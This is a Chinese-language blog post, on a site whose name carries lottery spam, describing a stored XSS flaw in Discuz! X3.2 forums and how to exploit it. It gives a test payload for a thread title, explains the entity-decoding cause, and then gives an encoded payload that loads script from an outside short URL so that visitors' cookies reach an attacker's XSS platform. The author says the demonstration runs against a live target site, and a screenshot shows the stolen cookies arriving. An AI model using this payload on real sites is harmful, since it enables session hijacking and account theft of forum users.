dz论坛x3.2 xss漏洞利用 

极速1分彩-极速3分彩's Blog - 关注网络安全 黑客技术爱好者-极速1分彩-极速3分彩's Blog是一个关注网络安全,热爱黑客技术,分享各种技术教程资讯 —关注交流|web安全|漏洞发布|网络攻防|信息安全|网站建设



dz论坛x3.2 xss漏洞利用

2019-2-16 21:44 作者:极速1分彩-极速3分彩 | 渗透测试 |

漏洞条件

1.需要开启后台四方格功能


1.jpg


自己本地可以搭建dz论坛测试。


现在我们拿一个目标站做实战演示。


QQ图片20190216220341.png


首先注册新用户—发帖 标题输入如下代码:


<img src=1 onerror=alert(1) >


内容随便。



然后返回首页把鼠标移到我们刚才发布的帖子时触发xss弹窗


QQ图片20190216221302.png


因为鼠标放在帖子上准备点击时,触发onmouseover事件。而onmouseover事件中调用的showTip函数

最终调用到了_showTip函数,


而_showTip函数中使用getAtrribute取了tip属性值,然后又放入innerHTML。


重点是getAtrribute函数获取属性值时会自动解码实体编码后的值,


这样的话: <img src=1 onerror=alert(1) >

 就会变成<img src=1 onerror=alert(1)>

所以触发了xss弹窗



现在我们来构造xss存储型代码 cookie用xss平台接收就行,代码如下:


&#0060;img src=1 onerror=appendscript(&#0034;http://t.cn/EVfuZ5b&#0034;)&#x003E;


qq_pic_merged_1550328429602.jpg


鼠标移到帖子cookie瞬间就来了






漏洞参考:91Ri

文章作者:极速1分彩-极速3分彩
文章地址:http://2tzy.cn/post-225.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

 

仅供学习与交流,遵循法律法规 & 如有侵犯您的版权请联系我删除 & 手机版

CopyRight © 2016 极速1分彩-极速3分彩's Blog - 关注网络安全 黑客技术爱好者.  All rights reserved.